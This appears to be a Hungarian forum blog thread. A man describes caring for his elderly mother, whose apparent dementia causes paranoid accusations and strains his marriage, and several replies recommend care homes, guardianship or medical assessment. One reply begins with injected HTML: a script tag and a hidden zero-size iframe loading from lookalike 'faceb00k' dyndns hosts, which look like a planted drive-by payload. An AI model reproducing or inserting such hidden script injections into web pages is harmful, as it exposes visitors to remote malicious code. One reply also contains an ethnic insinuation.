Street Racer STR motoros kesztyű a MotoZemtől

Most szemét vagyok?!

Óriási dilemma előtt állok és a véleményetekre vagyok kíváncsi.Az egész úgy indult,hogy évekkel ezelőtt elhatároztuk a párommal,hogy elköltözünk a szülői házból és együtt kezdünk új életet.Amikor ezt elmondtuk Anyámnak,ő kapott a lehetőségen és közölte,hogy szeretne velünk jönni,vegyünk együtt egy nagy házat,ő már úgyis idős(most 70),segítségre lesz szüksége.Megbeszéltük a párommal és úgy döntöttünk,hogy vállaljuk.Úgy lett megoldva,hogy az új házon ő lett a haszonélvező,hogy ha odakerül a sor,ne kelljen adóznunk mégegyszer.Összetettük hát a vagyonunkat és megvettük álmaink házát.Az első 3 évben nem is volt gond,csakhogy jött a gyerek és nekünk a kicsire kellett több figyelmet fordítani,nem Anyámra.Ami nála úgy jelentkezett,hogy egyre több "hülyeséget" kezdett csinálni meg mondani.Eleinte nem vettük komolyan,csak amikor már durva dolgokat vágott a fejünkhöz.Például volt rá eset,hogy reggel elszaladtam boltba és mikor hazaértem nekem esett,hogy milyen egy sz.r,szemét alak vagyok,hogy hol jártam egész éjjel,miért iszom el az összes pénzt,meg minden.Én meg csak pislogtam,hogy mi van?!Elmentünk vele orvoshoz,aki közölte velünk,hogy ez egy természetes időskori agysorvadás,visszafordíthatatlan,maximum nyugtatókat tud neki felírni,hogy ne izgassa fel magát.Mi nem akartuk lenyugtatózni,mondtuk,hogy nincs még akkora baj,majd megoldjuk szép szóval.Ment is ez egy darabig,de a helyzet folyamatosan romlik.Már ott tartunk,hogy elmegyünk valahova egy délutánra és mire hazaérünk,minden redőny leengedve,ablakok becsukva,mert jött egy csúnya felhő vagy egy kis szél fújt és ő becsukta.A házban meg az udvaron minden elpakolva,de a leglehetetlenebb helyekre,amit persze letagad,hogy ő lett volna.Ez így elsőre nem is tűnik olyan nagy bajnak,csakhogy rendszeresen már elég idegesítő,hiába mondtuk neki,hogy ne csinálja,hagyja úgy.Ráadásul a párom elég háklis arra,hogy ha valaki bemászkál a mi szobánkba,mondván ő se teszi ezt.Szerintem igaza van,de lehet,hogy elfogult vagyok.Vagy volt olyan,hogy az összes ruháját kipakolta,hogy az nem az övé,biztos kicseréltük.Meg hogy a nejem éjjel bemászkál hozzá lopni.De volt,hogy éjjel felöltözött,hogy neki mennie kell,de mikor kérdeztük,hogy hova,azt nem tudta,csak hogy mennie kell.Azóta nem alszunk nyugodtan éjjel,minden kis zajra ugrik valamelyikünk,nehogy lelépjen.Szóval szellemileg már nincs a toppon és hiába kéri tőle az ember,hogy ne csinálja,felesleges beszéd.Ilyenkor mindig azt a választ kapjuk,hogy mi csak fogjuk be a szánkat,neki ne mondjuk meg hogy éljen,mert örüljünk,hogy megvette nekünk a házat,nélküle sehol se lennénk.Állandóan azt hallgatjuk,hogy hálátlan dögök vagyunk,ki akarjuk nyírni őt,direkt mindig csak bántjuk.Dolgozunk mindketten,direkt váltott műszakban,hogy valaki mindig mellette legyen.Mit tud az ember ilyenkor tenni?Az Anyámnak vagy a páromnak adjak igazat.Szegény már nagyon ki van,sokszor veszekszünk az anyám miatt.Mindent ő csinál,mos,főz,takarít,gyógyszert intézi neki,magyarán mindent biztosítunk neki,a kisujját se kell mozdítania.Már ott tartunk,hogy nem örül neki a nejem,hogy ha bárhova is el akarok menni(motorozni,pecázni,kocsmázni),mert akkor ő itthon marad a megtestesült rosszindulattal,aki nem hagyja békén még éjjel se,mert bemegy hozzá a szobába,hogy hol az urad,mikor jön haza,miért nincs itthon,biztos megcsal.
Elegem van belőle és tudom,hogy a családi béke érdekében szét kéne költöznünk,csakhogy mivel már ilyen idős,hova mehetne egyedül és hogyan látná el magát?Ezt a párom is tudja,de már egyre nehezebben tolerálja a hülyeségeit.
Ti mit tennétek a helyemben?

Hozzászólások

Ez sajnos visszafordíthatatlan folyamat. Az én nagypapámat is elérte annak idején, de szerencsére csak nagyon rövid ideig szenvedett tőle és nem ilyen súlyosan.
A legjobb talán az lenne, ha találnátok neki egy olyan intézetet, ahol szakszerűen kezelni tudják. De ha ehhez nincs szívetek (valószínű nekem sem lenne), akkor tényleg írassátok fel a neki nyugtatókat.
 
Egyszer láttam egy ilyen intézetet belülről,egy hétig ott melóztunk.Láttam mi folyik ott,valami szörnyű ahogy bántak az emberekkel,úgyhogy ez teljesen halott ötlet részemről. :(
 
Pedig csak ez a megoldás,ez teljesen fel fog őrölni benneteket.Vannak jó helyek,és jó szakorvosok. Az én nagyimat is stabiliziálták,teljesen hasonló esettel.De a te anyud rossz állapotban van,mert agresszív,semmiképp,ne kezeljétek tovább otthon...
 
Nálunk is hasonló volt a helyzet, csak mi nem éltünk együtt a nagyfaterral és ez még tetézte a bajt. Én suliztam, szüleim dolgoztak ő meg egyedül maradt a mamám halála után. Kb. 6 évig semmi baj nem volt, ellátta magát, minden rendben ment. Aztán jött egy idegen ember, aki természetesen úgy adta ki magát, hogy segít a nagyfaternak. Persze nem így volt. Elvitte az autóját, elvitte vásárolni, illetve magának vásárolt a nagyfater pénzén. Majd szépen lassan kifosztotta, mert minden nap elvitte a bankba, vagy ATM-hez, amíg adott pénzt. Így derült ki a dolog, hogy hál istennek mindig ugyanoda vitte szerencsétlent és a bankosok kihívták a rendőrséget. Anyuék a munkából rohantak a kedves ember meg még a rendőröknek is előadta magát. Durva sztori volt. És mindennek tetejében a nagyfater áldta ezt az embert, minket meg utált és mi voltunk a szemetek, bezzeg a Gyuri... Ma is beleborzongok. Főleg, hogy amikor kórházba került, még oda is volt pofája utána menni annak a .... Mindegy, sajnos már nem tudunk mit tenni. A csávó eltűnt miután a nagyfater is meghalt, a pénzzel és mindennel (kb 1 m ft, vagy ki tudja mennyi, mert sose tudtuk mennyi van neki) És a lényeg, hogy mi is be akartuk utaltatni egy közeli idősek otthonába, hogy tudjuk látogatni és ne legyen egyedül, legyen orvosi felügyelet stb., de nem akarta. Talán ha engedi ma is élne és nem történt volna meg mindez... :( Próbáljatok keresni jó helyet, mert van, csak lehet, hogy messze, vagy drágán, de inkább mint hogy idegileg mindenki kikészüljön.
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Kitartás. Sajnos ez egy ilyen betegség, amit otthon nem lehet sokáig kezelni. Egy megfelelő otthont kell találni, ami nem intézet, mert némelyikben tényleg borzalmas állapotok uralkodnak. Vigyázzatok magatokra és egymásra, mert tönkremehet a kapcsolatotok is. Nem vagy se rossz, se hálátlan, ne is érezd annak magad. Fel a fejjel.
 
Azt hiszem,hogy ha valaki,hát én tudom,hogy miről beszélsz.Az egészben pedig az a legszebb,amikor valaki olyan mondja a szemedbe,hogy "hát de ezt ti vállaltátok,szeretnetek kell!",aki sose volt még ilyen szituba.Mindig könnyebb a más fa...val verni a csalánt.Kitartás és fontoljátok meg azt az intézet dolgot.
 
Sajnos én is csak azt tudom ajánlani, hogy idősek otthona. Férjem nagymamáját és nagypapáját is elérte ez az időskori probléma.:(Megszöktek otthonról, szállást kértek idegenektől, hogy mi verjük őket meg meg akarjuk ölni...még szerencse, hogy mindenki ismert minket a faluban. Elviselhetetlen volt velük együtt élni, mert mind a kettő másik korban ragadt le, és nem ismerték meg egymást...:eek:Anyósom ebbe az 5 évbe őszült bele. Tudom, hogy nagyon nehéz egy olyan embert "otthonba dugni" (ezt is csak olyanok mondják, akiknek soha nem kellett ilyen beteget ápolnia), aki számodra az egész életet jelentette, de a jövődet teszed vele tönkre, ha nem lépsz az ügyben. Ez nem lesz jobb, csak rosszabb.
 
Ez így első olvasásra organikus deluzív zavarnak tűnik. Vannak gyógyszerek, meg kell próbálni, mert van akin segít. (Ezeket háziorvos nem írhatja fel, ideggondozóba, vagy pszichiátriára kell menni hozzá.) Persze ez gyógyíthatatlan, és valószínűleg idővel romlani fog, szóval csodára ne számíts.
Tudom, hogy szörnyen hangzik, de mindenképpen gondnokság alá kell helyeztetni. Ez igazából csak annyit jelent, hogy a gyámügy és a bíróság cselekvőképességet korlátozó vagy kizáró végzést hoz, és az ügyei intézéséhez gondnokot rendel ki, aki te is lehetsz. Ez igazából arra jó, hogy elkerüljétek az olyan durva sztorikat, amiket Babulu is írt, mert aki gondnokság alatt van, az a gondnok nélkül nem köthet semmiféle szerződést, és ha a gondnok beleegyezik a kórházi kezelésbe/intézeti elhelyezésbe, akkor az ő beleegyezése nem igazán kell.
Egy ilyen beteg napi 24 órás felügyeletet igényel. Ha nem szeretnétek intézetbe helyezni, akkor ott van a házi betegápoló szolgálat, ami igaz, csak napi 1-2 óra, de az is egy kis szusszanást jelent. Hosszabb szusszanásra, ott van a pszichiátria. 1-2 hétre befekszik a mama, ott ellátják, teljesen kivisgálják minden szempontból, addig ti pihenhettek kicsit. És végül, az intézetek között is vannak jók. Azok általában fizetősök, de nem árt szétnézni, hátha. (Nem tudom, merre vagytok, de Tápiógyörgye olcsó részét meg se nézéttek, az kriminális...)
Nem vagy ettől szemét. Mi nagymamámmal éltünk végig hasonlót, ő csak azért nem került intézetbe, mert apámnak volt pénze állandó ápolót fizetni mellé - aki nem mellesleg hetente akart felmondani, mert nagymamám állandóan azzal vádolta, hogy megmérgezi, és amikor nem ismerte fel, akkor nekitámadt. Ja, meg nagyim a saját házában élt, apám csak naponta meglátogatta. Úgy azért jóval könnyebb.
 
Támogatom Macs hozzászólását kivizsgálás ügyben, a csajoknak pedig az intézet javaslatát. Főként a jogi dolgokat érdemes mielőbb rendbe tenni, hogy ne legyen bukta. Sajnos az idő halad, és a családodat simán szétnyírhatja egy ilyen szitu. Keményen hangzik, de én is azt mondom, hogy előre kell nézni, a párodat ezerrel becsülni, ha idáig keményen kitartott, és a gyerek miatt mielőbb békességes viszonyokat rendezni. Ne abban nőjön fel, hogy állandóan fúr-farag valaki, az pokoli (nekem anyám volt ilyen, most öregen meg még rosszabb), mert előbb-utóbb menekülésre fogja amint felnő, vagy anyuja mondja be az unalmast és megpattan kölyökkel együtt (joggal, mert van az a szituáció, hogy egyedül még albiban is jobb). Tehát mérlegelni kell, hogy megtartod-e a családodat annak árán, hogy mami ne kerüljön intézetbe (és amíg él, az ő golyói határozzák meg az életed) vagy mami valamiféle gondnokság alá kerül és a családod is egyben marad. Szerintem a szakszerű felügyelet mindenkinek jobb (maminak is és ti is nyugodtabbak is lesztek). (Egyébként lehet én is egy gyanakvó geci vagyok, de nem tartom az olyan embert betegnek, aki múltbéli önmagának is hasznos tettével zsarol, plusz utána állandó lelki terrorban tartja a famíliát. Inkább kissé elszállt gecinek, aki baromira unatkozik és túlságosan ki van nyalva a segge. Ha van energiája kirámolni párod cuccait -érdekes, a te cuccaidat nem lomolja- , lenne energiája arra is hogy megfőzzön a családnak...utálja a menyét valszeg, mert az nem azt csinálja amit ő csettint, plusz még lepereg róla a zsarolás.)
 
Kedves József! Hasonló cipőbe járunk, csak öreganyám hála Istennek nem lakik velünk. Két lehetőség van. Vagy adni köll a anyukádnak valami munkát, amivee egész nap eelehet, mer főleg unalmába találja ki eztet a sok baromságot (öreganyám dettó ilyen), vagy öregek otthonába köll vinni, mer ott figyeenek rája. Öreganyámná is ez utóbbit választottuk, mer ha idekőtöztettük vóna, abba anyám tuti két héten bellű belehal, hiába akkora a ház mind a hodály. Sajnos meg köll mentened a házasságodat, mer az hosszabb távú dolog (legalábbis rendeltetése szerint), mind ameddig anyukád élni fog. Bocs nem bántani akartalak, de ez van. Sok szerencsét hozzá!:ciao:
 
Babulu;bt21561 írta:
Nálunk is hasonló volt a helyzet, csak mi nem éltünk együtt a nagyfaterral és ez még tetézte a bajt. Én suliztam, szüleim dolgoztak ő meg egyedül maradt a mamám halála után. Kb. 6 évig semmi baj nem volt, ellátta magát, minden rendben ment. Aztán jött egy idegen ember, aki természetesen úgy adta ki magát, hogy segít a nagyfaternak. Persze nem így volt. Elvitte az autóját, elvitte vásárolni, illetve magának vásárolt a nagyfater pénzén. Majd szépen lassan kifosztotta, mert minden nap elvitte a bankba, vagy ATM-hez, amíg adott pénzt. Így derült ki a dolog, hogy hál istennek mindig ugyanoda vitte szerencsétlent és a bankosok kihívták a rendőrséget. Anyuék a munkából rohantak a kedves ember meg még a rendőröknek is előadta magát. Durva sztori volt. És mindennek tetejében a nagyfater áldta ezt az embert, minket meg utált és mi voltunk a szemetek, bezzeg a Gyuri... Ma is beleborzongok. Főleg, hogy amikor kórházba került, még oda is volt pofája utána menni annak a .... Mindegy, sajnos már nem tudunk mit tenni. A csávó eltűnt miután a nagyfater is meghalt, a pénzzel és mindennel (kb 1 m ft, vagy ki tudja mennyi, mert sose tudtuk mennyi van neki) És a lényeg, hogy mi is be akartuk utaltatni egy közeli idősek otthonába, hogy tudjuk látogatni és ne legyen egyedül, legyen orvosi felügyelet stb., de nem akarta. Talán ha engedi ma is élne és nem történt volna meg mindez... :( Próbáljatok keresni jó helyet, mert van, csak lehet, hogy messze, vagy drágán, de inkább mint hogy idegileg mindenki kikészüljön.

Sajna az öregek azt hiszik, hogy ők képesek az önellátásra, amikor a környezetük azt mondja, hogy nem. A napokban én is tapasztaltam ezt. Amikor meg visszaélnek a bizalmukkal, és meglopják őket sokszor vagy nem vesznek róla tudomást, vagy másként fogják fel, vagy ha rájön a dologra, akkor nem meri bevallani a családnak, se a rendőrségen, mert nehogy szenílisnek tartsák... Pedig szerintem 70-80-90. évesen nem gáz, ha az ember nem szuperál úgy ahogy kéne. Segítséget sem szégyen kérni.

Én így fiatalon bevallom, hogy néha csinálok nagy f.szságokat...

Nekem a nagyapám volt ilyen, de ő jóindulatú volt, csak naiv lett szegény öreg korára. Nem zárta az ajtót, mert úgy sem jön be senki (a régi világban lehet, hogy nem), idegeneket engedett be, bizsut vásárolt arany áráért (sejteni lehet, hogy mely népcsoport vette erre rá)...stb. Állandó felügyeletre szorult sajnos.

Az anyám megoldása sem megoldás, hogy ő szószerint a saját háza rabjává tette az öreget és heti 2x nézettet felé (mert ő maga nem mászott el hozzá persze, mindig mást küldött a saját apjához. Így volt, hogy halála előtt fél évvel látta utoljára.), hogy kaját küldessen apámmal, anno, amikor otthon éltem velem. Én sokat takarítottam nála, mert neki már nem volt igénye rá...

A lényeg: Sztem a kapcsolatotokat tutira megmérgezi, ha együtt éltek egy rosszindulatú és szenílis emberrel. Vagy az otthon, vagy az állandó felügyelet kell mellé, mert ez tényleg csak rosszabb lesz. Lassan nem ismer majd fel titeket...stb. Sajnos ez a fajta bezombulás úgy vettem észre, hogy azért jön létre az időseknél, mert állandóan otthon ülnek és nem sokat mozdulnak ki, nem sokat használják az agyunkat (már bocsi a megfogalmazásért). Ezért is fél sok nyugdíj előtt álló kolléganőm, ha otthon lesz nehogy beszűküljön a gondolkodása...
 

Blogbejegyzés információ

Szerző
József
Olvasás
1,079
Hozzászólások
22
Utolsó frissítés

Tagok Blogjai további bejegyzései

Oszd meg ezt a bejegyzést

CsamShop kendők

Back
Oldal tetejére